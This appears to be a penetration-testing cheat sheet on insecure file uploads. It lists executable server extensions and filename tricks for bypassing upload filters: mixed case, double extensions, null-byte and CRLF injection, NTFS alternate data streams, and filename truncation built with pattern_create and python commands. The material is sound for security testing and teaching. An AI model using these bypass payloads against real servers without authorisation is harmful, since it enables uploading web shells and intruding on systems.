# Insecure File Uploads {% hint style="success" %} Related Sites: * [Pentesting: File Upload](app://obsidian.md/\[https:/book.hacktricks.xyz/pentesting-web/file-upload]\(https://book.hacktricks.xyz/pentesting-web/file-upload\)) {% endhint %} ## File Upload General Methodology *** ### Other useful extensions: **PHP**: `.php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module` **Working in PHPv8**: `.php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp` **ASP**: `.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml` **Jsp**: `.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action` **Coldfusion**: `.cfm, .cfml, .cfc, .dbm` **Flash**: `.swf` **Perl**: `.pl, .cgi` **Erlang Yaws Web Server**: `.yaws` ### Bypass file extensions checks If they apply, the check the previous extensions. Also test them using some **uppercase letters**: `pHp`, `.pHP5`, `.PhAr`… Check adding a valid extension before the execution extension (use previous extensions also): * `file.png.php` * `file.png.Php5` Try adding **special characters at the end**. You could use Burp to bruteforce all the ascii and Unicode characters. (Note that you can also try to use the previously mentioned extensions) * `file.php%20` * `file.php%0a` * `file.php%00` * `file.php%0d%0a` * `file.php/` * `file.php.`\\ * `file.` * `file.php....` * `file.pHp5....` Try to bypass the protections tricking the extension parser of the server-side with techniques like **doubling the extension or adding junk data (null bytes) between extensions**. You can also use the previous extensions to prepare a better payload. * `file.png.php` * `file.png.pHp5` * `file.php#.png` * `file.php%00.png` * `file.php\x00.png` * `file.php%0a.png` * `file.php%0d%0a.png` * `file.phpJunk123png` Add another layer of extensions to the previous check: * `file.png.jpg.php` * `file.php%00.png%00.jpg` Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension **.php, but not necessarily ending in .php** will execute code): * **ex**: `file.php.png` Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character “`:`” will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. “`file.asax:.jpg`”). This file might be edited later using other techniques such as using its short filename. The “`::$data`” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “`file.asp::$data.`”) Try to **break the filename limits**. The valid extension gets cut off. And the malicious PHP gets left. `AAA<--SNIP-->AAA.php` ```shell # Linux maximum 255 bytes /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png # Upload the file and check response how many characters it allows. Let's say 236 python -c 'print "A" * 232' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA # Make the payload AAA<--SNIP 232 A-->AAA.php.png ```